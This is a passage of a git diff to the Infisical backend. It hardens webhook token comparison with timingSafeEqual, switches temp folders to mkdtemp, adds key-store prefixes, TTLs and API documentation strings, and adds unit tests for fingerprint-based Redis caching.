"@app/ee/services/secret-scanning-v2/secret-scanning-v2-queue"; +import { crypto } from "@app/lib/crypto"; import { logger } from "@app/lib/logger"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { KmsDataKey } from "@app/services/kms/kms-types"; @@ -57,7 +58,13 @@ export const gitlabSecretScanningService = ( const credentials = JSON.parse(decryptedCredentials.toString()) as TGitLabDataSourceCredentials; - if (token !== credentials.token) { + const storedToken = Buffer.from(credentials.token, "utf8"); + const receivedToken = Buffer.from(token, "utf8"); + + const isValid = + storedToken.length === receivedToken.length && crypto.nativeCrypto.timingSafeEqual(storedToken, receivedToken); + + if (!isValid) { logger.error( `secretScanningV2PushEvent: GitLab - Invalid webhook token [dataSourceId=${dataSource.id}] [projectId=${payload.project.id}]` ); diff --git a/backend/src/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-fns.ts b/backend/src/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-fns.ts index 94d699c7fdb..ab561ae505b 100644 --- a/backend/src/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-fns.ts +++ b/backend/src/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-fns.ts @@ -1,25 +1,14 @@ import { Octokit } from "@octokit/rest"; import { execFile } from "child_process"; -import { mkdir, readFile, rm, writeFile } from "fs"; +import { readFile, rm, writeFile } from "fs"; +import { mkdtemp } from "fs/promises"; import { tmpdir } from "os"; import { join } from "path"; import { SecretMatch } from "./secret-scanning-queue-types"; export function createTempFolder(): Promise { - return new Promise((resolve, reject) => { - const tempDir = tmpdir(); - const tempFolderName = Math.random().toString(36).substring(2); - const tempFolderPath = join(tempDir, tempFolderName); - - mkdir(tempFolderPath, (err) => { - if (err) { - reject(err); - } else { - resolve(tempFolderPath); - } - 
}); - }); + return mkdtemp(join(tmpdir(), "infisical-scan-")); } export function writeTextToFile(filePath: string, content: string): Promise { diff --git a/backend/src/ee/services/trusted-ip/trusted-ip-service.ts b/backend/src/ee/services/trusted-ip/trusted-ip-service.ts index 6b9686e25b0..99343e0cc38 100644 --- a/backend/src/ee/services/trusted-ip/trusted-ip-service.ts +++ b/backend/src/ee/services/trusted-ip/trusted-ip-service.ts @@ -3,6 +3,8 @@ import { ForbiddenError } from "@casl/ability"; import { ActionProjectType } from "@app/db/schemas"; import { BadRequestError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TProjectDALFactory } from "@app/services/project/project-dal"; import { TLicenseServiceFactory } from "../license/license-service"; @@ -66,7 +68,9 @@ export const trustedIpServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Create, ProjectPermissionSub.IpAllowList); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const plan = await licenseService.getPlan(project.orgId); if (!plan.ipAllowlisting) throw new BadRequestError({ @@ -112,7 +116,9 @@ export const trustedIpServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Create, ProjectPermissionSub.IpAllowList); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const plan = await licenseService.getPlan(project.orgId); if (!plan.ipAllowlisting) throw new BadRequestError({ @@ -158,7 +164,9 @@ export const trustedIpServiceFactory = ({ }); 
ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Create, ProjectPermissionSub.IpAllowList); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const plan = await licenseService.getPlan(project.orgId); if (!plan.ipAllowlisting) throw new BadRequestError({ diff --git a/backend/src/keystore/keystore.ts b/backend/src/keystore/keystore.ts index 5e1cf9395b9..d44006c1c57 100644 --- a/backend/src/keystore/keystore.ts +++ b/backend/src/keystore/keystore.ts @@ -31,6 +31,7 @@ export const PgSqlLock = { IdentityLogin: (identityId: string, nonce: string) => pgAdvisoryLockHashText(`identity-login:${identityId}:${nonce}`), PamResourceSshCaInit: (resourceId: string) => pgAdvisoryLockHashText(`pam-resource-ssh-ca-init:${resourceId}`), CreateIdentity: (orgId: string) => pgAdvisoryLockHashText(`create-identity:${orgId}`), + CreateGateway: (orgId: string) => pgAdvisoryLockHashText(`create-gateway:${orgId}`), AccessSharedSecret: (sharedSecretId: string) => pgAdvisoryLockHashText(`access-shared-secret:${sharedSecretId}`), KmsOrgKeyCreation: (orgId: string) => pgAdvisoryLockHashText(`kms-org-key:${orgId}`), KmsOrgDataKeyCreation: (orgId: string) => pgAdvisoryLockHashText(`kms-org-data-key:${orgId}`), @@ -69,24 +70,17 @@ export const KeyStorePrefixes = { ActiveSSEConnections: (projectId: string, identityId: string, connectionId: string) => `sse-connections:${projectId}:${identityId}:${connectionId}` as const, - ProjectPermission: ( - projectId: string, - version: number, - actorType: string, - actorId: string, - actionProjectType: string - ) => `project-permission:${projectId}:${version}:${actorType}:${actorId}:${actionProjectType}` as const, - ProjectPermissionDalVersion: (projectId: string) => `project-permission:${projectId}:dal-version` as const, - UserProjectPermissionPattern: (userId: string) => 
`project-permission:*:*:USER:${userId}:*` as const, - IdentityProjectPermissionPattern: (identityId: string) => `project-permission:*:*:IDENTITY:${identityId}:*` as const, - GroupMemberProjectPermissionPattern: (projectId: string, groupId: string) => - `group-member-project-permission:${projectId}:${groupId}:*` as const, + ProjectPermissionMarker: (projectId: string, actorType: string, actorId: string, actionProjectType: string) => + `project-permission-marker:${projectId}:${actorType}:${actorId}:${actionProjectType}` as const, + ProjectPermissionData: (projectId: string, actorType: string, actorId: string, actionProjectType: string) => + `project-permission-data:${projectId}:${actorType}:${actorId}:${actionProjectType}` as const, PkiAcmeNonce: (nonce: string) => `pki-acme-nonce:${nonce}` as const, MfaSession: (mfaSessionId: string) => `mfa-session:${mfaSessionId}` as const, WebAuthnChallenge: (userId: string) => `webauthn-challenge:${userId}` as const, UserMfaLockoutLock: (userId: string) => `user-mfa-lockout-lock:${userId}` as const, UserMfaUnlockEmailSent: (userId: string) => `user-mfa-unlock-email-sent:${userId}` as const, + UsedTotpCode: (userId: string, code: string) => `used-totp-code:${userId}:${code}` as const, AiMcpServerOAuth: (sessionId: string) => `ai-mcp-server-oauth:${sessionId}` as const, @@ -104,21 +98,61 @@ export const KeyStorePrefixes = { TelemetryIdentifyIdentity: (dedupKey: string) => `telemetry-identify-identity:${dedupKey}` as const, TelemetryGroupIdentify: (orgId: string) => `telemetry-group-identify:${orgId}` as const, + TelemetryIdentify: (distinctId: string) => `telemetry-identify:${distinctId}` as const, SecretEtag: (projectId: string) => `secret-etag:${projectId}` as const, - RefreshTokenGrace: (sessionId: string) => `refresh-token-grace:${sessionId}` as const + + PamAwsIamAccessKeyId: (sessionId: string) => `pam-aws-iam-access-key-id:${sessionId}` as const, + + CertDashboardStats: (projectId: string) => 
`cert-dashboard-stats:${projectId}` as const, + CertActivityTrend: (projectId: string, range: string) => `cert-activity-trend:${projectId}:${range}` as const, + CertPqcTrend: (projectId: string, range: string) => `cert-pqc-trend:${projectId}:${range}` as const, + RefreshTokenGrace: (sessionId: string) => `refresh-token-grace:${sessionId}` as const, + InsightsCache: (projectId: string, endpoint: string) => `insights-cache:${projectId}:${endpoint}` as const, + + AdminConfig: "infisical-admin-cfg", + InvalidatingCache: "invalidating-cache", + SecretManagerCachePattern: "secret-manager:*", + AuditLogMigrationAlert: "audit-log-migration-alert-last-row-count", + LicenseCloudPlan: (orgId: string) => `infisical-cloud-plan-${orgId}` as const, + IdentityLockoutState: (identityId: string, authMethod: string, slug: string) => + `lockout:identity:${identityId}:${authMethod}:${slug}` as const, + IdentityLockoutStateByMethodPattern: (identityId: string, authMethod: string) => + `lockout:identity:${identityId}:${authMethod}:*` as const, + IdentityLockoutStatePattern: (identityId: string) => `lockout:identity:${identityId}:*` as const, + + TelemetryEvent: (event: string, bucketId: string, distinctId: string, uuid: string) => + `telemetry-event-${event}-${bucketId}-${distinctId}-${uuid}` as const, + TelemetryEventByBucketPattern: (event: string, bucketId: string) => `telemetry-event-${event}-${bucketId}-*` as const }; export const KeyStoreTtls = { SetSyncSecretIntegrationLastRunTimestampInSeconds: 60, SetSecretSyncLastRunTimestampInSeconds: 60, AccessTokenStatusUpdateInSeconds: 120, - ProjectPermissionCacheInSeconds: 300, // 5 minutes - ProjectPermissionDalVersionTtl: "15m", // Project permission DAL version TTL + ProjectPermissionMarkerTtlSeconds: 10, // 10 seconds - short-lived marker for fingerprint validation + ProjectPermissionDataTtlSeconds: 600, // 10 minutes - longer-lived data payload MfaSessionInSeconds: 300, // 5 minutes WebAuthnChallengeInSeconds: 300, // 5 minutes + 
UsedTotpCodeInSeconds: 120, // covers the full Β±30s acceptance window (window:1 β†’ 90s) with margin ProjectSSEConnectionTtlSeconds: 180, // Must be > heartbeat interval (60s) * 2 TelemetryIdentifyIdentityInSeconds: 86400, // 24 hours - RefreshTokenGraceInSeconds: 30 + RefreshTokenGraceInSeconds: 10, + InsightsCacheInSeconds: 300, // 5 minutes + AdminConfigInSeconds: 60, + InvalidatingCacheInSeconds: 1800, // 30 minutes max lock for cache invalidation job + AuditLogMigrationAlertInSeconds: 604800, // 7 days + LicenseCloudPlanInSeconds: 300, // 5 minutes + AiMcpEndpointOAuthFlowInSeconds: 300, // 5 minutes + AiMcpServerOAuthSessionInSeconds: 600, // 10 minutes + DashboardCacheInSeconds: 600, // 10 minutes + ProjectEnvironmentOperationMarkerInSeconds: 10, + UserMfaUnlockEmailSentInSeconds: 300, // 5 minutes + TelemetryGroupIdentifyInSeconds: 3600, // 1 hour + TelemetryAggregatedEventInSeconds: 600, // 10 minutes + SecretEtagInSeconds: 900, // 15 minutes + PkiAcmeNonceInSeconds: 300, // 5 minutes + GatewayRelayCredentialInSeconds: 600, // 10 minutes - TURN credential lifetime + SecretReplicationSuccessInSeconds: 10 }; type TDeleteItems = { diff --git a/backend/src/lib/api-docs/constants.ts b/backend/src/lib/api-docs/constants.ts index 77206111c08..e09b964a560 100644 --- a/backend/src/lib/api-docs/constants.ts +++ b/backend/src/lib/api-docs/constants.ts @@ -1025,7 +1025,19 @@ export const PROJECTS = { metadata: "Filter by metadata key-value pairs. Each entry should have a key (required) and optionally a value to match against.", extendedKeyUsage: - "Filter by extended key usage. Only certificates containing this EKU will be returned (e.g. 'codeSigning', 'serverAuth')." + "Filter by extended key usage. Only certificates containing this EKU will be returned (e.g. 'codeSigning', 'serverAuth').", + keyAlgorithm: "Filter by key algorithm (e.g. 'RSA_2048', 'EC_prime256v1').", + signatureAlgorithm: "Filter by signature algorithm (e.g. 
'RSA-SHA256', 'ECDSA-SHA256').", + keySizes: "Filter by key sizes in bits (e.g. [2048, 4096]).", + caIds: "Filter by certificate authority IDs.", + enrollmentTypes: "Filter by enrollment types (e.g. 'api', 'est', 'acme', 'scep').", + source: "Filter by certificate source ('issued', 'discovered', 'imported').", + notAfterFrom: "Filter certificates expiring on or after this date.", + notAfterTo: "Filter certificates expiring on or before this date.", + notBeforeFrom: "Filter certificates issued on or after this date.", + notBeforeTo: "Filter certificates issued on or before this date.", + sortBy: "Column to sort by (e.g. 'notAfter', 'notBefore', 'commonName').", + sortOrder: "Sort direction: 'asc' or 'desc'." }, LIST_PKI_SUBSCRIBERS: { projectId: "The ID of the project to list PKI subscribers for." @@ -2459,6 +2471,10 @@ export const KMS = { keyId: "The ID of the key to export the private key or key material for." }, + BULK_EXPORT_PRIVATE_KEYS: { + keyIds: "An array of KMS key IDs to export. Maximum 100 keys per request." + }, + SIGN: { keyId: "The ID of the key to sign the data with.", data: "The data in string format to be signed (base64 encoded).", @@ -2543,6 +2559,12 @@ export const CertificateAuthorities = { certificateAuthorityArn: `The ARN of the AWS Private Certificate Authority to use for issuing certificates.`, region: `The AWS region where the Private Certificate Authority is located.` }, + AWS_ACM_PUBLIC_CA: { + appConnectionId: `The ID of the AWS App Connection to use for authenticating with AWS Certificate Manager (ACM). 
This connection must have permissions to request, describe, export, renew, and delete certificates.`, + dnsAppConnectionId: `The ID of the AWS App Connection to use for creating and managing Route 53 CNAME records required for ACM domain validation.`, + hostedZoneId: `The Route 53 hosted zone ID to use for ACM DNS validation CNAME records.`, + region: `The AWS region to use for the ACM API calls.` + }, INTERNAL: { type: "The type of CA to create.", friendlyName: "A friendly name for the CA.", @@ -2628,6 +2650,16 @@ export const AppConnections = { VERCEL: { apiToken: "The API token used to authenticate with Vercel." }, + ONA: { + personalAccessToken: "The Personal Access Token used to authenticate with Ona." + }, + DIGICERT: { + apiKey: "The CertCentral API Key used to authenticate with DigiCert.", + region: "The CertCentral region the API key belongs to (us or eu)." + }, + TRAVISCI: { + apiToken: "The API token used to authenticate with Travis CI." + }, CAMUNDA: { clientId: "The client ID used to authenticate with Camunda.", clientSecret: "The client secret used to authenticate with Camunda." @@ -2778,6 +2810,14 @@ export const AppConnections = { VENAFI: { apiKey: "The API key used to authenticate with Venafi TLS Protect Cloud.", region: "The region of your Venafi TLS Protect Cloud instance (e.g., 'us', 'eu')." + }, + VENAFI_TPP: { + tppUrl: "The HTTPS URL of the Venafi TPP instance (e.g., 'https://tpp.example.com'). Must use HTTPS.", + clientId: + "The OAuth client ID registered in the Venafi TPP API Integration. Used for token-based authentication.", + username: + "The username used to authenticate with Venafi TPP. Supports formats: 'DOMAIN\\\\username', 'username@domain.com', or local usernames.", + password: "The password used to authenticate with Venafi TPP." } } }; @@ -2935,6 +2975,10 @@ export const SecretSyncs = { scope: "The Terraform Cloud scope that secrets should be synced to.", category: "The Terraform Cloud category that secrets should be synced to." 
}, + ONA: { + projectId: "The Ona project ID to sync secrets to.", + projectName: "An optional display name for the Ona project." + }, VERCEL: { app: "The ID of the Vercel app to sync secrets to.", appName: "The name of the Vercel app to sync secrets to.", @@ -2943,8 +2987,13 @@ export const SecretSyncs = { teamId: "The ID of the Vercel team to sync secrets to.", teamName: "The name of the team to sync the secrets to. This is an optional field only intended for display purposes.", - targetEnvironments: "An optional array of Vercel environments to add shared environment variables to.", - targetProjects: "An optional array of Vercel projects to add shared environment variables to." + targetEnvironments: + "An optional array of Vercel default environments (development, preview, production) to add shared environment variables to.", + applyToAllCustomEnvironments: + "Whether to apply shared environment variables to all custom environments in the team.", + targetProjects: "An optional array of Vercel projects to add shared environment variables to.", + sensitive: + "Whether to create Vercel environment variables as Sensitive (cannot be read back). Not allowed when targeting the Development environment." }, LARAVEL_FORGE: { orgSlug: "The slug of the Laravel Forge org to sync secrets to.", @@ -3066,6 +3115,12 @@ export const SecretSyncs = { projectId: "The ID of the project on the external Infisical instance to sync secrets to.", environment: "The environment slug on the external Infisical instance to sync secrets to.", secretPath: "The secret path on the external Infisical instance to sync secrets to." + }, + TRAVIS_CI: { + repositoryId: "The ID of the Travis CI repository to sync secrets to.", + repositorySlug: "The slug (owner/repo) of the Travis CI repository to sync secrets to.", + branch: + "The branch of the Travis CI repository to sync secrets to. If omitted, secrets sync to the repository-level scope." 
} } }; @@ -3217,6 +3272,10 @@ export const SecretRotations = { limitReset: "The type of limit reset for the API key (daily, weekly, monthly, or null for no reset).", includeByokInLimit: "Whether to include BYOK (Bring Your Own Key) usage in the spending limit. When enabled, usage from your own provider keys counts toward this key's limit. See OpenRouter BYOK docs for details." + }, + SUPABASE_API_KEY: { + projectRef: "The reference ID of the Supabase project to rotate the API key for.", + keyType: "The type of the API key to rotate (e.g. publishable, secret)." } }, SECRETS_MAPPING: { @@ -3277,6 +3336,9 @@ export const SecretRotations = { }, OPEN_ROUTER_API_KEY: { apiKey: "The name of the secret that the rotated OpenRouter API key will be mapped to." + }, + SUPABASE_API_KEY: { + apiKey: "The name of the secret that the rotated Supabase API key will be mapped to." } } }; diff --git a/backend/src/lib/aws/error.ts b/backend/src/lib/aws/error.ts new file mode 100644 index 00000000000..c0e3744ba5c --- /dev/null +++ b/backend/src/lib/aws/error.ts @@ -0,0 +1,4 @@ +// AWS SDK v3 exception classes are only generated for errors explicitly modeled in a service's API definition. +// Generic errors like ThrottlingException are not modeled by all services (e.g. Secrets Manager, KMS), +// so they cannot be caught with instanceof. This utility checks the error name directly as a fallback. 
+export const isAwsError = (error: unknown, name: string): boolean => (error as { name: string }).name === name; diff --git a/backend/src/lib/cache/with-cache.test.ts b/backend/src/lib/cache/with-cache.test.ts index 5048d32eb59..6a261912a3a 100644 --- a/backend/src/lib/cache/with-cache.test.ts +++ b/backend/src/lib/cache/with-cache.test.ts @@ -215,6 +215,123 @@ describe("withCache", () => { ); }); + it("should compute TTL from fetcher result when ttlSeconds is a function", async () => { + mockKeyStore.getItem.mockResolvedValue(null); + const data = { expiresInSeconds: 42 }; + const fetcher = vi.fn().mockResolvedValue(data); + const ttlFn = vi.fn((result: typeof data) => result.expiresInSeconds); + + await withCache({ + keyStore: mockKeyStore, + key: "dynamic-ttl-key", + ttlSeconds: ttlFn, + fetcher + }); + + expect(ttlFn).toHaveBeenCalledWith(data); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith("dynamic-ttl-key", 42, JSON.stringify(data)); + }); + + it("should not call TTL function on cache hit", async () => { + const data = { cached: true }; + mockKeyStore.getItem.mockResolvedValue(JSON.stringify(data)); + const fetcher = vi.fn(); + const ttlFn = vi.fn(() => 100); + + await withCache({ + keyStore: mockKeyStore, + key: "hit-dynamic-ttl-key", + ttlSeconds: ttlFn, + fetcher + }); + + expect(ttlFn).not.toHaveBeenCalled(); + expect(fetcher).not.toHaveBeenCalled(); + }); + + it("should call reviver on cache hit to mutate parsed value", async () => { + const cached = { date: "2026-04-13T00:00:00.000Z", value: 10 }; + mockKeyStore.getItem.mockResolvedValue(JSON.stringify(cached)); + const fetcher = vi.fn(); + const reviver = vi.fn((parsed: { date: string | Date; value: number }) => { + // eslint-disable-next-line no-param-reassign + parsed.date = new Date(parsed.date as string); + }); + + const result = await withCache<{ date: string | Date; value: number }>({ + keyStore: mockKeyStore, + key: "reviver-key", + ttlSeconds: 60, + fetcher, + reviver + }); + + 
expect(reviver).toHaveBeenCalledOnce(); + expect(result.date).toBeInstanceOf(Date); + expect((result.date as Date).toISOString()).toBe("2026-04-13T00:00:00.000Z"); + expect(fetcher).not.toHaveBeenCalled(); + }); + + it("should use reviver's return value when it returns a new object", async () => { + const cached = { value: 1 }; + mockKeyStore.getItem.mockResolvedValue(JSON.stringify(cached)); + const fetcher = vi.fn(); + const reviver = vi.fn((parsed: { value: number }) => ({ value: parsed.value * 2 })); + + const result = await withCache<{ value: number }>({ + keyStore: mockKeyStore, + key: "reviver-return-key", + ttlSeconds: 60, + fetcher, + reviver + }); + + expect(result.value).toBe(2); + }); + + it("should not call reviver on cache miss", async () => { + mockKeyStore.getItem.mockResolvedValue(null); + const fetcher = vi.fn().mockResolvedValue({ fresh: true }); + const reviver = vi.fn(); + + await withCache({ + keyStore: mockKeyStore, + key: "miss-reviver-key", + ttlSeconds: 60, + fetcher, + reviver + }); + + expect(reviver).not.toHaveBeenCalled(); + expect(fetcher).toHaveBeenCalledOnce(); + }); + + it("should fall back to fetcher when reviver throws", async () => { + const { logger } = await import("@app/lib/logger"); + const cached = { value: 1 }; + const fresh = { value: 99 }; + mockKeyStore.getItem.mockResolvedValue(JSON.stringify(cached)); + const fetcher = vi.fn().mockResolvedValue(fresh); + const reviver = vi.fn(() => { + throw new Error("reviver boom"); + }); + + const result = await withCache({ + keyStore: mockKeyStore, + key: "reviver-throws-key", + ttlSeconds: 60, + fetcher, + reviver + }); + + expect(result).toEqual(fresh); + expect(fetcher).toHaveBeenCalledOnce(); + expect(logger.warn).toHaveBeenCalledWith( + expect.objectContaining({ key: "reviver-throws-key" }), + expect.stringContaining("cache parse failed") + ); + }); + it("should log warnings on cache read and write failures", async () => { const { logger } = await import("@app/lib/logger"); 
@@ -240,3 +357,294 @@ describe("withCache", () => { ); }); }); + +describe("withCacheFingerprint", () => { + let mockKeyStore: { + getItem: ReturnType; + setItemWithExpiry: ReturnType; + }; + + beforeEach(() => { + mockKeyStore = { + getItem: vi.fn(), + setItemWithExpiry: vi.fn().mockResolvedValue("OK") + }; + }); + + afterEach(() => { + vi.clearAllMocks(); + }); + + it("should return cached data on marker and data hit (0 DB reads)", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const payload = { id: "user-123", permissions: ["read", "write"] }; + const cachedData = { fingerprint: "fp-abc", payload }; + + mockKeyStore.getItem.mockImplementation(async (key: string) => { + if (key === "marker-key") return "1"; + if (key === "data-key") return JSON.stringify(cachedData); + return null; + }); + + const fingerprintFetcher = vi.fn(); + const dataFetcher = vi.fn(); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(fingerprintFetcher).not.toHaveBeenCalled(); + expect(dataFetcher).not.toHaveBeenCalled(); + expect(mockKeyStore.setItemWithExpiry).not.toHaveBeenCalled(); + }); + + it("should revalidate and reset marker on marker miss + data hit + fingerprint match (1 DB read)", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const payload = { id: "user-456", permissions: ["admin"] }; + const fingerprint = "fp-def"; + const cachedData = { fingerprint, payload }; + + mockKeyStore.getItem.mockImplementation(async (key: string) => { + if (key === "marker-key") return null; // Marker expired + if (key === "data-key") return JSON.stringify(cachedData); + return null; + }); + + const fingerprintFetcher = vi.fn().mockResolvedValue(fingerprint); + const dataFetcher = vi.fn(); + + const result = await 
withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(fingerprintFetcher).toHaveBeenCalledOnce(); + expect(dataFetcher).not.toHaveBeenCalled(); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith("marker-key", 10, "1"); + }); + + it("should full re-fetch on fingerprint mismatch (1 heavy DB read)", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const oldPayload = { id: "user-789", permissions: ["read"] }; + const newPayload = { id: "user-789", permissions: ["read", "write"] }; + const oldFingerprint = "fp-old"; + const newFingerprint = "fp-new"; + const oldCachedData = { fingerprint: oldFingerprint, payload: oldPayload }; + + mockKeyStore.getItem.mockImplementation(async (key: string) => { + if (key === "marker-key") return null; + if (key === "data-key") return JSON.stringify(oldCachedData); + return null; + }); + + const fingerprintFetcher = vi.fn().mockResolvedValue(newFingerprint); + const dataFetcher = vi.fn().mockResolvedValue(newPayload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(newPayload); + expect(fingerprintFetcher).toHaveBeenCalledOnce(); + expect(dataFetcher).toHaveBeenCalledOnce(); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith( + "data-key", + 600, + JSON.stringify({ fingerprint: newFingerprint, payload: newPayload }) + ); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith("marker-key", 10, "1"); + }); + + it("should full re-fetch on marker miss + data miss", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const payload = { id: "new-user", permissions: ["viewer"] }; + const 
fingerprint = "fp-fresh"; + + mockKeyStore.getItem.mockResolvedValue(null); // Both marker and data miss + + const fingerprintFetcher = vi.fn().mockResolvedValue(fingerprint); + const dataFetcher = vi.fn().mockResolvedValue(payload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(fingerprintFetcher).toHaveBeenCalledOnce(); + expect(dataFetcher).toHaveBeenCalledOnce(); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith( + "data-key", + 600, + JSON.stringify({ fingerprint, payload }) + ); + expect(mockKeyStore.setItemWithExpiry).toHaveBeenCalledWith("marker-key", 10, "1"); + }); + + it("should call reviver on cache hits", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const payload = { date: "2026-04-13T00:00:00.000Z", value: 42 }; + const cachedData = { fingerprint: "fp-date", payload }; + + mockKeyStore.getItem.mockImplementation(async (key: string) => { + if (key === "marker-key") return "1"; + if (key === "data-key") return JSON.stringify(cachedData); + return null; + }); + + const fingerprintFetcher = vi.fn(); + const dataFetcher = vi.fn(); + const reviver = vi.fn((parsed: { date: string | Date; value: number }) => { + // eslint-disable-next-line no-param-reassign + parsed.date = new Date(parsed.date as string); + }); + + const result = await withCacheFingerprint<{ date: string | Date; value: number }>({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher, + reviver + }); + + expect(reviver).toHaveBeenCalledOnce(); + expect(result.date).toBeInstanceOf(Date); + expect((result.date as Date).toISOString()).toBe("2026-04-13T00:00:00.000Z"); + }); + + it("should gracefully handle Redis read failures", async () 
=> { + const { withCacheFingerprint } = await import("./with-cache"); + const { logger } = await import("@app/lib/logger"); + const payload = { id: "fallback-user" }; + const fingerprint = "fp-fallback"; + + mockKeyStore.getItem.mockRejectedValue(new Error("Redis connection lost")); + + const fingerprintFetcher = vi.fn().mockResolvedValue(fingerprint); + const dataFetcher = vi.fn().mockResolvedValue(payload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(fingerprintFetcher).toHaveBeenCalledOnce(); + expect(dataFetcher).toHaveBeenCalledOnce(); + expect(logger.warn).toHaveBeenCalledWith( + expect.objectContaining({ key: "marker-key" }), + expect.stringContaining("marker read failed") + ); + }); + + it("should bypass cache and call dataFetcher directly on fingerprint fetch failure", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + const { logger } = await import("@app/lib/logger"); + const payload = { id: "rescue-user" }; + + mockKeyStore.getItem.mockResolvedValue(null); + + const fingerprintFetcher = vi.fn().mockRejectedValue(new Error("DB timeout")); + const dataFetcher = vi.fn().mockResolvedValue(payload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(dataFetcher).toHaveBeenCalledOnce(); + expect(mockKeyStore.setItemWithExpiry).not.toHaveBeenCalled(); + expect(logger.error).toHaveBeenCalledWith( + expect.objectContaining({ err: expect.any(Error) as Error }) as unknown as Record, + expect.stringContaining("fingerprint fetch failed") + ); + }); + + it("should not block on Redis write failures", async () => { + const { 
withCacheFingerprint } = await import("./with-cache"); + const { logger } = await import("@app/lib/logger"); + const payload = { id: "write-fail-user" }; + const fingerprint = "fp-write"; + + mockKeyStore.getItem.mockResolvedValue(null); + mockKeyStore.setItemWithExpiry.mockRejectedValue(new Error("Redis write timeout")); + + const fingerprintFetcher = vi.fn().mockResolvedValue(fingerprint); + const dataFetcher = vi.fn().mockResolvedValue(payload); + + const result = await withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }); + + expect(result).toEqual(payload); + expect(logger.warn).toHaveBeenCalledWith( + expect.objectContaining({ key: "data-key" }), + expect.stringContaining("data write failed") + ); + }); + + it("should propagate dataFetcher errors", async () => { + const { withCacheFingerprint } = await import("./with-cache"); + + mockKeyStore.getItem.mockResolvedValue(null); + + const fingerprintFetcher = vi.fn().mockResolvedValue("fp-error"); + const dataFetcher = vi.fn().mockRejectedValue(new Error("Database query failed")); + + await expect( + withCacheFingerprint({ + keyStore: mockKeyStore, + dataKey: "data-key", + markerKey: "marker-key", + markerTtlSeconds: 10, + dataTtlSeconds: 600, + fingerprintFetcher, + dataFetcher + }) + ).rejects.toThrow("Database query failed"); + }); +}); diff --git a/backend/src/lib/cache/with-cache.ts b/backend/src/lib/cache/with-cache.ts index 901f9a1399c..8b1747f524d 100644 --- a/backend/src/lib/cache/with-cache.ts +++ b/backend/src/lib/cache/with-cache.ts @@ -1,11 +1,55 @@ import { TKeyStoreFactory } from "@app/keystore/keystore"; import { logger } from "@app/lib/logger"; +type TCacheKeyStore = Pick; + +/** Read a raw string from Redis, returning null on miss or error. 
*/ +const cacheGet = async (keyStore: TCacheKeyStore, key: string, errMsg: string): Promise => { + try { + return await keyStore.getItem(key); + } catch (err) { + logger.warn({ key, err }, `${errMsg} [key=${key}]`); + return null; + } +}; + +/** Write to Redis with the given TTL, swallowing errors. */ +const cacheSet = async ( + keyStore: TCacheKeyStore, + key: string, + ttlSeconds: number, + value: string, + errMsg: string +): Promise => { + try { + await keyStore.setItemWithExpiry(key, ttlSeconds, value); + } catch (err) { + logger.warn({ key, err }, `${errMsg} [key=${key}]`); + } +}; + +/** Apply an optional reviver; returns the revived value or the original if the reviver returns void. */ +const applyReviver = (value: T, reviver?: (parsed: T) => T | void): T => { + if (!reviver) return value; + const revived = reviver(value); + return revived === undefined ? value : revived; +}; + type TWithCacheOpts = { - keyStore: Pick; + keyStore: TCacheKeyStore; key: string; - ttlSeconds: number; + /** + * Cache TTL in seconds. Can be a fixed number, or a function of the fetched + * 